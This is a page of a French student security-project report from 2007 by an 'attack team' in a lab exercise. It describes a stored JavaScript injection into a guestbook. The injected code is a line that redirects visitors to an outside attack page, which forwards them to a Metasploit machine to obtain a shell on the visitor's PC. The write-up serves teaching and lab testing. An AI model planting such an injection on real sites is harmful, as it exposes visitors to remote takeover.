Objet du rapport / réunion - inetdoc.net
Objet du rapport / réunion - inetdoc.net
Objet du rapport / réunion - inetdoc.net
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
IUP STRI – M2 2007<br />
Projet Sécurité – Equipe attaque G1<br />
Conclusion<br />
Ce type d’attaque est vraiment très long à mettre en place est nécessite beaucoup de<br />
(développement|bidouillage). Parfois, il faut même de l’ingénierie sociale pour faire<br />
fonctionner ces attaques. Par contre en prenant le temps, ces attaques très ciblées peuvent<br />
être très efficaces.<br />
Le gros avantage de ces attaques, c’est que l’on n’a pas besoin d’être sur le réseau local de<br />
l’entreprise, l'Inter<strong>net</strong> suffit et contrairement au injections qui commencent à être connues :<br />
ces méthodes sont encore à la marge.<br />
Rediriger les visiteurs vers un serveur Metasploit<br />
Principe de l’attaque<br />
Le principe de l’injection de javascript est de servir de support à l’attaque Metasploit qui nous<br />
permettra d’obtenir un shell dans la machine cible<br />
Pour réaliser cette attaque, nous donnons à l’équipe « Défense » l’instruction de se<br />
connecter sur leur livre d’or à partir de leur client SP0.<br />
L’idée consiste à injecter le code javascript suivant dans le livre d’or :<br />
<br />
window.location='http://jordix.com/attack/';<br />
<br />
Ainsi, lors de l’affichage des commentaires, lorsque le livre d’or sera chargé, le navigateur<br />
client interprètera le code javascript affiché.<br />
Le navigateur sera alors redirigé vers la page 'http://jordix.com/attack/ qui contient une<br />
message comme quoi le site a été piraté. De plus il re-redirige le navigateur web vers l’IP de<br />
la machine attaquante en écoute avec metasploit pour obtenir un shell sur le PC cible.<br />
Voici un récapitulatif:<br />
On injecte le code javascript suivant dans le livre d’or<br />
Lorsque le client ciblé essaye de voir les commentaires postés sur le livre d’or, le<br />
code javascript s’exécute sur le client.<br />
Le navigateur <strong>du</strong> client est redirigé vers le site 'http://jordix.com/attack/<br />
Un message de hacking s’affiche<br />
De plus le client est redirigé vers l’IP (172.16.48.14) <strong>du</strong> PC malveillant contenant<br />
metasploit.<br />
Nous obtenons ainsi un shell sur la machine ciblée.<br />
Voici le code contenu dans la page 'http://jordix.com/attack/index.html:<br />
<br />
<br />
<br />
<br />
[ Attack Team STRI M2 G1 ]<br />
<br />
<br />
. Copyright (c) 2007 – GNU Free Documentation licence Équipe Attaque G1 – M2 STRI 42